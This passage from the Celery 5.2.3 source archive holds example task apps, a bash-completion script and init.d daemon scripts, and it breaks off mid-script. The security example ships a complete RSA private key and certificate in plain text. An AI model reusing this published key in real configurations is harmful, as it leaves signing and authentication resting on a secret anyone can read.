celery-5.2.3/examples/periodic-tasks/myapp.py0000664000175000017500000000276300000000000021144 0ustar00asifasif00000000000000"""myapp.py Usage:: # The worker service reacts to messages by executing tasks. (window1)$ python myapp.py worker -l INFO # The beat service sends messages at scheduled intervals. (window2)$ python myapp.py beat -l INFO # XXX To diagnose problems use -l debug: (window2)$ python myapp.py beat -l debug # XXX XXX To diagnose calculated runtimes use C_REMDEBUG envvar: (window2) $ C_REMDEBUG=1 python myapp.py beat -l debug You can also specify the app to use with the `celery` command, using the `-A` / `--app` option:: $ celery -A myapp worker -l INFO With the `-A myproj` argument the program will search for an app instance in the module ``myproj``. You can also specify an explicit name using the fully qualified form:: $ celery -A myapp:app worker -l INFO """ from celery import Celery app = Celery( # XXX The below 'myapp' is the name of this module, for generating # task names when executed as __main__. 'myapp', broker='amqp://guest@localhost//', # ## add result backend here if needed. # backend='rpc' ) app.conf.timezone = 'UTC' @app.task def say(what): print(what) @app.on_after_configure.connect def setup_periodic_tasks(sender, **kwargs): # Calls say('hello') every 10 seconds. sender.add_periodic_task(10.0, say.s('hello'), name='add every 10') # See periodic tasks user guide for more examples: # http://docs.celeryproject.org/en/latest/userguide/periodic-tasks.html if __name__ == '__main__': app.start() ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7237554 celery-5.2.3/examples/resultgraph/0000775000175000017500000000000000000000000017053 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/resultgraph/tasks.py0000664000175000017500000000545400000000000020562 0ustar00asifasif00000000000000# Example:: # >>> R = A.apply_async() # >>> list(joinall(R)) # [['A 0', 'A 1', 'A 2', 'A 3', 'A 4', 'A 5', 'A 6', 'A 7', 'A 8', 'A 9'], # ['B 0', 'B 1', 'B 2', 'B 3', 'B 4', 'B 5', 'B 6', 'B 7', 'B 8', 'B 9'], # ['C 0', 'C 1', 'C 2', 'C 3', 'C 4', 'C 5', 'C 6', 'C 7', 'C 8', 'C 9'], # ['D 0', 'D 1', 'D 2', 'D 3', 'D 4', 'D 5', 'D 6', 'D 7', 'D 8', 'D 9'], # ['E 0', 'E 1', 'E 2', 'E 3', 'E 4', 'E 5', 'E 6', 'E 7', 'E 8', 'E 9'], # ['F 0', 'F 1', 'F 2', 'F 3', 'F 4', 'F 5', 'F 6', 'F 7', 'F 8', 'F 9'], # ['G 0', 'G 1', 'G 2', 'G 3', 'G 4', 'G 5', 'G 6', 'G 7', 'G 8', 'G 9'], # ['H 0', 'H 1', 'H 2', 'H 3', 'H 4', 'H 5', 'H 6', 'H 7', 'H 8', 'H 9']] # # # Joining the graph asynchronously with a callback # (Note: only two levels, the deps are considered final # when the second task is ready). # # >>> unlock_graph.apply_async((A.apply_async(), # ... A_callback.s()), countdown=1) from collections import deque from celery import chord, group, signature, task, uuid from celery.result import AsyncResult, ResultSet, allow_join_result @task() def add(x, y): return x + y @task() def make_request(id, url): print(f'-get: {url!r}') return url @task() def B_callback(urls, id): print(f'-batch {id} done') return urls @task() def B(id): return chord( make_request.s(id, f'{id} {i!r}') for i in range(10) )(B_callback.s(id)) @task() def A(): return group(B.s(c) for c in 'ABCDEFGH').apply_async() def joinall(R, timeout=None, propagate=True): stack = deque([R]) try: use_native = joinall.backend.supports_native_join except AttributeError: use_native = False while stack: res = stack.popleft() if isinstance(res, ResultSet): j = res.join_native if use_native else res.join stack.extend(j(timeout=timeout, propagate=propagate)) elif isinstance(res, AsyncResult): stack.append(res.get(timeout=timeout, propagate=propagate)) else: yield res @task() def unlock_graph(result, callback, interval=1, propagate=False, max_retries=None): if result.ready(): second_level_res = result.get() if second_level_res.ready(): with allow_join_result(): signature(callback).delay(list(joinall( second_level_res, propagate=propagate))) else: unlock_graph.retry(countdown=interval, max_retries=max_retries) @task() def A_callback(res): print(f'-everything done: {res!r}') return res class chord2: def __init__(self, tasks, **options): self.tasks = tasks self.options = options def __call__(self, body, **options): body.options.setdefault('task_id', uuid()) unlock_graph.apply_async() ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7237554 celery-5.2.3/examples/security/0000775000175000017500000000000000000000000016362 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/security/mysecureapp.py0000664000175000017500000000204200000000000021267 0ustar00asifasif00000000000000"""mysecureapp.py Usage:: Generate Certificate: ``` mkdir ssl openssl req -x509 -newkey rsa:4096 -keyout ssl/worker.key -out ssl/worker.pem -days 365 # remove passphrase openssl rsa -in ssl/worker.key -out ssl/worker.key Enter pass phrase for ssl/worker.key: writing RSA key ``` cd examples/security (window1)$ python mysecureapp.py worker -l INFO (window2)$ cd examples/security (window2)$ python >>> from mysecureapp import boom >>> boom.delay().get() "I am a signed message" """ from celery import Celery app = Celery( 'mysecureapp', broker='redis://localhost:6379/0', backend='redis://localhost:6379/0' ) app.conf.update( security_key='ssl/worker.key', security_certificate='ssl/worker.pem', security_cert_store='ssl/*.pem', task_serializer='auth', event_serializer='auth', accept_content=['auth'], result_accept_content=['json'] ) app.setup_security() @app.task def boom(): return "I am a signed message" if __name__ == '__main__': app.start() ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7277553 celery-5.2.3/examples/security/ssl/0000775000175000017500000000000000000000000017163 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/security/ssl/worker.key0000664000175000017500000000625300000000000021214 0ustar00asifasif00000000000000-----BEGIN RSA PRIVATE KEY----- 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 6S65AoIBACl/dvEBX/iJ5PkBC7WWiqK0qjXD2IfdXbLHj+fLe/8/oNNLGWCjyhh9 4MjwYiO06JJLcX7Wm3OiX16V7uMgvdgf0xLMNK4dFEhatyh3+lJzVPRibqVn+l6i v6rzWh9intqZnx9CTxE7Y9vuGjOuUeyDDB//5U1bMVdsy3P4scDNUgOLoY6D5zKz 1G9qoKfgq/fo8Qq+IaRM81X6mQwEvxKppSTpATFDXmgko1mARAxtsHvB3+6oHp/1 67iSvaB5E/BgWjEiJbCJum3Zi1hZyiK0a0iO3if5BSuRKJE3GGeQnbWAKlO2eiaQ sh+fkUnjxrojLFlRtE57zFmAXp75v7UCggEAFkXtS94e9RTNaGa0p6qVYjYvf6Yu gze9bI/04PYs1LGVVhnt2V2I2yhgEJhFTMjysSQwbaLHN/RzorhtLfEyoOp3GrnX ojuSONbBIdGquKf4Zj+KaNOqBHeiPlNzRZR4rYz2shkoG4RIf2HeLltIM9oHjETo U/hahPL+nHLEYmB3cbq6fiYlz3lwcszB9S8ubm9EiepdVSzmwsM617m2rrShOMgh 6wB4NQmm9aSZ6McsGbojZLnbFp/WrbP76Nlh7kyu1KKGsPBlKRiWqYVS/QUTvgy4 QsAFLmb7afYAGHwOj+KDCIQeR/tzDLOu8WC4Z4l30wfFvHxsxFiJLYw1kg== -----END RSA PRIVATE KEY----- ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/security/ssl/worker.pem0000664000175000017500000000360300000000000021201 0ustar00asifasif00000000000000-----BEGIN CERTIFICATE----- MIIFYDCCA0igAwIBAgIJALjIfmbgNR83MA0GCSqGSIb3DQEBCwUAMEUxCzAJBgNV BAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEwHwYDVQQKDBhJbnRlcm5ldCBX aWRnaXRzIFB0eSBMdGQwHhcNMTgxMDAyMTYwMTQ2WhcNMTkxMDAyMTYwMTQ2WjBF MQswCQYDVQQGEwJBVTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50 ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC CgKCAgEAshWXegn+JRX62T73jqFBVtugVWkqT+IGfEQXrL9Tz+sxDVxof4PDeD7L a0lXEppVEqBpR9maR/1CZAmKLmh6snpTC44JXJIRt7suWRQIuy/7f6TDOuh3NtGo HpNuUj4dBkhNNKfHJe9A9LLKjSHplpBZyDwJzqWX8Y1pky8fJTMIuuR6zZs8YR9h Xi0/XyntS/We9XQRUCMpO85VVsVx/KGcYsTzD8ph/YG9HSriKKOvSfqtmef9Lzt2 Psn6BnMk13H0UgrD8RGwv8cIVs4rMOYYnUfGe0p6nsnHCQIOOJBK58+HQJRtLNao I5foSrlU74JzNIyImX/8ED33e1g9JerNVNpMeONvajdfxsn4Dl9haZcharwZKoL5 o1RO8skDMZwV3VdlQT9908q2a40y7BfKRH3duvD7lexTUacyreakL73+24FFFnMC NrpRb58VaqmQASCGpfVv7RGLK3dxqKKpayL4ALdUXSlzZpXJ0nlyaA/A68DbYmVo oHHDwVLxxaA3MMOxIPYlOP/tHbh7hD+S+DE9+cFd/XEFejlUoUWEWiSnzecSfg+9 WvUokUCzn0A/eWBYgB2cSNY2Rq0IqqjN/LpMlkwn377/4VmsB7fFrmj9WEftKr4L Q8AHW/ryMRl1L0NrgOX7yfeyyze1T9nWE+I5pNsAY0ZKlS6vHwECAwEAAaNTMFEw HQYDVR0OBBYEFFJmMBkSiBMuVzuG/dUc6cWYNATuMB8GA1UdIwQYMBaAFFJmMBkS iBMuVzuG/dUc6cWYNATuMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQAD ggIBAGFuEmA0IhOi9eLl4Az1L4GOPgk67k5P/bViOeC5Q96YGU6kqVp/FPCQg8Pt 0vcj6NBhTD+aifT4IaSbCClCDbwuuC/cit67JUxsEdJmSlpEqeccD6OhMmpcpc63 NrFlPpE61Hy3TbUld1hDbhfaAnyFOJFZHWI1fOlrzRu1Rph9TEdSDSJFQQm8NQjX VWBQrBV/tolMVGAkaeYtVBSmdRj4T6QcAaCWzSJe2VjyE7QDi+SafKvc4DOIlDmF 66//dN6oBe0xFEZ1Ng0vgC4Y/CbTqMJEQQi9+HBkbL25gKMz70K1aBBKFDRq3ohF Ltw0Sylp2gY6/MO+B1TsP7sa1E/GECz570sZW22yZuGpZw7zEf1wzuGOaDvD1jct R5R1OAlCapmyeGOziKAfgF1V4BBKnI6q8L1//iuIssgjXvEXNeVpVnqk8IqCxwRP H/VDV6hh51VVuIpksogjpJ5BAsR7/dqFDwJ+nzbTFXQYRlZfgBn89d+7YV1h6SnU RmjcaNABfqmcRsPmEvGsf0UhkB3il0EIOz1KA5o9t8YcgNmzU/s0X9jFwGLp4CI5 z6WGY9P472uHqQeZJv2D8x45Qg6bRmJKTWZ0Yq5ewMeUxyALczJ4fCMr1ufhWrAz /1csxJCTgohGqKecHzVTk7nVz2pCX5eRt80AeFjPvOh3vTn3 -----END CERTIFICATE----- ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7277553 celery-5.2.3/examples/tutorial/0000775000175000017500000000000000000000000016356 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/tutorial/tasks.py0000664000175000017500000000023600000000000020056 0ustar00asifasif00000000000000from celery import Celery app = Celery('tasks', broker='amqp://') @app.task() def add(x, y): return x + y if __name__ == '__main__': app.start() ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.3237484 celery-5.2.3/extra/0000775000175000017500000000000000000000000014020 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7277553 celery-5.2.3/extra/bash-completion/0000775000175000017500000000000000000000000017104 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/extra/bash-completion/celery.bash0000664000175000017500000000117400000000000021231 0ustar00asifasif00000000000000_celery_completion() { local IFS=$' ' COMPREPLY=( $( env COMP_WORDS="${COMP_WORDS[*]}" \ COMP_CWORD=$COMP_CWORD \ _CELERY_COMPLETE=complete $1 ) ) return 0 } _celery_completionetup() { local COMPLETION_OPTIONS="" local BASH_VERSION_ARR=(${BASH_VERSION//./ }) # Only BASH version 4.4 and later have the nosort option. if [ ${BASH_VERSION_ARR[0]} -gt 4 ] || ([ ${BASH_VERSION_ARR[0]} -eq 4 ] && [ ${BASH_VERSION_ARR[1]} -ge 4 ]); then COMPLETION_OPTIONS="-o nosort" fi complete $COMPLETION_OPTIONS -F _celery_completion celery } _celery_completionetup; ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7277553 celery-5.2.3/extra/generic-init.d/0000775000175000017500000000000000000000000016617 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/extra/generic-init.d/celerybeat0000775000175000017500000002156100000000000020671 0ustar00asifasif00000000000000#!/bin/sh -e # ========================================================= # celerybeat - Starts the Celery periodic task scheduler. # ========================================================= # # :Usage: /etc/init.d/celerybeat {start|stop|force-reload|restart|try-restart|status} # :Configuration file: /etc/default/celerybeat or /etc/default/celeryd # # See http://docs.celeryproject.org/en/latest/userguide/daemonizing.html#generic-init-scripts ### BEGIN INIT INFO # Provides: celerybeat # Required-Start: $network $local_fs $remote_fs # Required-Stop: $network $local_fs $remote_fs # Default-Start: 2 3 4 5 # Default-Stop: 0 1 6 # Short-Description: celery periodic task scheduler ### END INIT INFO # Cannot use set -e/bash -e since the kill -0 command will abort # abnormally in the absence of a valid process ID. #set -e VERSION=10.1 echo "celery init v${VERSION}." if [ $(id -u) -ne 0 ]; then echo "Error: This program can only be used by the root user." echo " Unprivileged users must use 'celery beat --detach'" exit 1 fi origin_is_runlevel_dir () { set +e dirname $0 | grep -q "/etc/rc.\.d" echo $? } # Can be a runlevel symlink (e.g., S02celeryd) if [ $(origin_is_runlevel_dir) -eq 0 ]; then SCRIPT_FILE=$(readlink "$0") else SCRIPT_FILE="$0" fi SCRIPT_NAME="$(basename "$SCRIPT_FILE")" # /etc/init.d/celerybeat: start and stop the celery periodic task scheduler daemon. # Make sure executable configuration script is owned by root _config_sanity() { local path="$1" local owner=$(ls -ld "$path" | awk '{print $3}') local iwgrp=$(ls -ld "$path" | cut -b 6) local iwoth=$(ls -ld "$path" | cut -b 9) if [ "$(id -u $owner)" != "0" ]; then echo "Error: Config script '$path' must be owned by root!" echo echo "Resolution:" echo "Review the file carefully, and make sure it hasn't been " echo "modified with mailicious intent. When sure the " echo "script is safe to execute with superuser privileges " echo "you can change ownership of the script:" echo " $ sudo chown root '$path'" exit 1 fi if [ "$iwoth" != "-" ]; then # S_IWOTH echo "Error: Config script '$path' cannot be writable by others!" echo echo "Resolution:" echo "Review the file carefully, and make sure it hasn't been " echo "modified with malicious intent. When sure the " echo "script is safe to execute with superuser privileges " echo "you can change the scripts permissions:" echo " $ sudo chmod 640 '$path'" exit 1 fi if [ "$iwgrp" != "-" ]; then # S_IWGRP echo "Error: Config script '$path' cannot be writable by group!" echo echo "Resolution:" echo "Review the file carefully, and make sure it hasn't been " echo "modified with malicious intent. When sure the " echo "script is safe to execute with superuser privileges " echo "you can change the scripts permissions:" echo " $ sudo chmod 640 '$path'" exit 1 fi } scripts="" if test -f /etc/default/celeryd; then scripts="/etc/default/celeryd" _config_sanity /etc/default/celeryd . /etc/default/celeryd fi EXTRA_CONFIG="/etc/default/${SCRIPT_NAME}" if test -f "$EXTRA_CONFIG"; then scripts="$scripts, $EXTRA_CONFIG" _config_sanity "$EXTRA_CONFIG" . "$EXTRA_CONFIG" fi echo "Using configuration: $scripts" CELERY_BIN=${CELERY_BIN:-"celery"} DEFAULT_USER="celery" DEFAULT_PID_FILE="/var/run/celery/beat.pid" DEFAULT_LOG_FILE="/var/log/celery/beat.log" DEFAULT_LOG_LEVEL="INFO" DEFAULT_CELERYBEAT="$CELERY_BIN" CELERYBEAT=${CELERYBEAT:-$DEFAULT_CELERYBEAT} CELERYBEAT_LOG_LEVEL=${CELERYBEAT_LOG_LEVEL:-${CELERYBEAT_LOGLEVEL:-$DEFAULT_LOG_LEVEL}} CELERYBEAT_SU=${CELERYBEAT_SU:-"su"} CELERYBEAT_SU_ARGS=${CELERYBEAT_SU_ARGS:-""} # Sets --app argument for CELERY_BIN CELERY_APP_ARG="" if [ ! -z "$CELERY_APP" ]; then CELERY_APP_ARG="--app=$CELERY_APP" fi CELERYBEAT_USER=${CELERYBEAT_USER:-${CELERYD_USER:-$DEFAULT_USER}} # Set CELERY_CREATE_DIRS to always create log/pid dirs. CELERY_CREATE_DIRS=${CELERY_CREATE_DIRS:-0} CELERY_CREATE_RUNDIR=$CELERY_CREATE_DIRS CELERY_CREATE_LOGDIR=$CELERY_CREATE_DIRS if [ -z "$CELERYBEAT_PID_FILE" ]; then CELERYBEAT_PID_FILE="$DEFAULT_PID_FILE" CELERY_CREATE_RUNDIR=1 fi if [ -z "$CELERYBEAT_LOG_FILE" ]; then CELERYBEAT_LOG_FILE="$DEFAULT_LOG_FILE" CELERY_CREATE_LOGDIR=1 fi export CELERY_LOADER if [ -n "$2" ]; then CELERYBEAT_OPTS="$CELERYBEAT_OPTS $2" fi CELERYBEAT_LOG_DIR=`dirname $CELERYBEAT_LOG_FILE` CELERYBEAT_PID_DIR=`dirname $CELERYBEAT_PID_FILE` # Extra start-stop-daemon options, like user/group. CELERYBEAT_CHDIR=${CELERYBEAT_CHDIR:-$CELERYD_CHDIR} if [ -n "$CELERYBEAT_CHDIR" ]; then DAEMON_OPTS="$DAEMON_OPTS --workdir=$CELERYBEAT_CHDIR" fi export PATH="${PATH:+$PATH:}/usr/sbin:/sbin" check_dev_null() { if [ ! -c /dev/null ]; then echo "/dev/null is not a character device!" exit 75 # EX_TEMPFAIL fi } maybe_die() { if [ $? -ne 0 ]; then echo "Exiting: $*" exit 77 # EX_NOPERM fi } create_default_dir() { if [ ! -d "$1" ]; then echo "- Creating default directory: '$1'" mkdir -p "$1" maybe_die "Couldn't create directory $1" echo "- Changing permissions of '$1' to 02755" chmod 02755 "$1" maybe_die "Couldn't change permissions for $1" if [ -n "$CELERYBEAT_USER" ]; then echo "- Changing owner of '$1' to '$CELERYBEAT_USER'" chown "$CELERYBEAT_USER" "$1" maybe_die "Couldn't change owner of $1" fi if [ -n "$CELERYBEAT_GROUP" ]; then echo "- Changing group of '$1' to '$CELERYBEAT_GROUP'" chgrp "$CELERYBEAT_GROUP" "$1" maybe_die "Couldn't change group of $1" fi fi } check_paths() { if [ $CELERY_CREATE_LOGDIR -eq 1 ]; then create_default_dir "$CELERYBEAT_LOG_DIR" fi if [ $CELERY_CREATE_RUNDIR -eq 1 ]; then create_default_dir "$CELERYBEAT_PID_DIR" fi } create_paths () { create_default_dir "$CELERYBEAT_LOG_DIR" create_default_dir "$CELERYBEAT_PID_DIR" } is_running() { pid=$1 ps $pid > /dev/null 2>&1 } wait_pid () { pid=$1 forever=1 i=0 while [ $forever -gt 0 ]; do if ! is_running $pid; then echo "OK" forever=0 else kill -TERM "$pid" i=$((i + 1)) if [ $i -gt 60 ]; then echo "ERROR" echo "Timed out while stopping (30s)" forever=0 else sleep 0.5 fi fi done } stop_beat () { echo -n "Stopping ${SCRIPT_NAME}... " if [ -f "$CELERYBEAT_PID_FILE" ]; then wait_pid $(cat "$CELERYBEAT_PID_FILE") else echo "NOT RUNNING" fi } _chuid () { ${CELERYBEAT_SU} ${CELERYBEAT_SU_ARGS} \ "$CELERYBEAT_USER" -c "$CELERYBEAT $*" } start_beat () { echo "Starting ${SCRIPT_NAME}..." _chuid $CELERY_APP_ARG $DAEMON_OPTS beat --detach \ --pidfile="$CELERYBEAT_PID_FILE" \ --logfile="$CELERYBEAT_LOG_FILE" \ --loglevel="$CELERYBEAT_LOG_LEVEL" \ $CELERYBEAT_OPTS } check_status () { local failed= local pid_file=$CELERYBEAT_PID_FILE if [ ! -e $pid_file ]; then echo "${SCRIPT_NAME} is down: no pid file found" failed=true elif [ ! -r $pid_file ]; then echo "${SCRIPT_NAME} is in unknown state, user cannot read pid file." failed=true else local pid=`cat "$pid_file"` local cleaned_pid=`echo "$pid" | sed -e 's/[^0-9]//g'` if [ -z "$pid" ] || [ "$cleaned_pid" != "$pid" ]; then echo "${SCRIPT_NAME}: bad pid file ($pid_file)" failed=true else local failed= kill -0 $pid 2> /dev/null || failed=true if [ "$failed" ]; then echo "${SCRIPT_NAME} (pid $pid) is down, but pid file exists!" failed=true else echo "${SCRIPT_NAME} (pid $pid) is up..." fi fi fi [ "$failed" ] && exit 1 || exit 0 } case "$1" in start) check_dev_null check_paths start_beat ;; stop) check_paths stop_beat ;; reload|force-reload) echo "Use start+stop" ;; status) check_status ;; restart) echo "Restarting celery periodic task scheduler" check_paths stop_beat && check_dev_null && start_beat ;; create-paths) check_dev_null create_paths ;; check-paths) check_dev_null check_paths ;; *) echo "Usage: /etc/init.d/${SCRIPT_NAME} {start|stop|restart|create-paths|status}" exit 64 # EX_USAGE ;; esac exit 0 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/extra/generic-init.d/celeryd0000775000175000017500000002510300000000000020175 0ustar00asifasif00000000000000#!/bin/sh -e # ============================================ # celeryd - Starts the Celery worker daemon. # ============================================ # # :Usage: /etc/init.d/celeryd {start|stop|force-reload|restart|try-restart|status} # :Configuration file: /etc/default/celeryd (or /usr/local/etc/celeryd on BSD) # # See http://docs.celeryproject.org/en/latest/userguide/daemonizing.html#generic-init-scripts ### BEGIN INIT INFO # Provides: celeryd # Required-Start: $network $local_fs $remote_fs # Required-Stop: $network $local_fs $remote_fs # Default-Start: 2 3 4 5 # Default-Stop: 0 1 6 # Short-Description: celery task worker daemon ### END INIT INFO # # # To implement separate init-scripts, copy this script and give it a different # name. That is, if your new application named "little-worker" needs an init, # you should use: # # cp /etc/init.d/celeryd /etc/init.d/little-worker # # You can then configure this by manipulating /etc/default/little-worker. # VERSION=10.1 echo "celery init v${VERSION}." if [ $(id -u) -ne 0 ]; then echo "Error: This program can only be used by the root user." echo " Unprivileged users must use the 'celery multi' utility, " echo " or 'celery worker --detach'." exit 1 fi origin_is_runlevel_dir () { set +e dirname $0 | grep -q "/etc/rc.\.d" echo $? } # Can be a runlevel symlink (e.g., S02celeryd) if [ $(origin_is_runlevel_dir) -eq 0 ]; then SCRIPT_FILE=$(readlink "$0") else SCRIPT_FILE="$0" fi SCRIPT_NAME="$(basename "$SCRIPT_FILE")" DEFAULT_USER="celery" DEFAULT_PID_FILE="/var/run/celery/%n.pid" DEFAULT_LOG_FILE="/var/log/celery/%n%I.log" DEFAULT_LOG_LEVEL="INFO" DEFAULT_NODES="celery" DEFAULT_CELERYD="-m celery worker --detach" if [ -d "/etc/default" ]; then CELERY_CONFIG_DIR="/etc/default" else CELERY_CONFIG_DIR="/usr/local/etc" fi CELERY_DEFAULTS=${CELERY_DEFAULTS:-"$CELERY_CONFIG_DIR/${SCRIPT_NAME}"} # Make sure executable configuration script is owned by root _config_sanity() { local path="$1" local owner=$(ls -ld "$path" | awk '{print $3}') local iwgrp=$(ls -ld "$path" | cut -b 6) local iwoth=$(ls -ld "$path" | cut -b 9) if [ "$(id -u $owner)" != "0" ]; then echo "Error: Config script '$path' must be owned by root!" echo echo "Resolution:" echo "Review the file carefully, and make sure it hasn't been " echo "modified with mailicious intent. When sure the " echo "script is safe to execute with superuser privileges " echo "you can change ownership of the script:" echo " $ sudo chown root '$path'" exit 1 fi if [ "$iwoth" != "-" ]; then # S_IWOTH echo "Error: Config script '$path' cannot be writable by others!" echo echo "Resolution:" echo "Review the file carefully, and make sure it hasn't been " echo "modified with malicious intent. When sure the " echo "script is safe to execute with superuser privileges " echo "you can change the scripts permissions:" echo " $ sudo chmod 640 '$path'" exit 1 fi if [ "$iwgrp" != "-" ]; then # S_IWGRP echo "Error: Config script '$path' cannot be writable by group!" echo echo "Resolution:" echo "Review the file carefully, and make sure it hasn't been " echo "modified with malicious intent. When sure the " echo "script is safe to execute with superuser privileges " echo "you can change the scripts permissions:" echo " $ sudo chmod 640 '$path'" exit 1 fi } if [ -f "$CELERY_DEFAULTS" ]; then _config_sanity "$CELERY_DEFAULTS" echo "Using config script: $CELERY_DEFAULTS" . "$CELERY_DEFAULTS" fi # Sets --app argument for CELERY_BIN CELERY_APP_ARG="" if [ ! -z "$CELERY_APP" ]; then CELERY_APP_ARG="--app=$CELERY_APP" fi # Options to su # can be used to enable login shell (CELERYD_SU_ARGS="-l"), # or even to use start-stop-daemon instead of su. CELERYD_SU=${CELERY_SU:-"su"} CELERYD_SU_ARGS=${CELERYD_SU_ARGS:-""} CELERYD_USER=${CELERYD_USER:-$DEFAULT_USER} # Set CELERY_CREATE_DIRS to always create log/pid dirs. CELERY_CREATE_DIRS=${CELERY_CREATE_DIRS:-0} CELERY_CREATE_RUNDIR=$CELERY_CREATE_DIRS CELERY_CREATE_LOGDIR=$CELERY_CREATE_DIRS if [ -z "$CELERYD_PID_FILE" ]; then CELERYD_PID_FILE="$DEFAULT_PID_FILE" 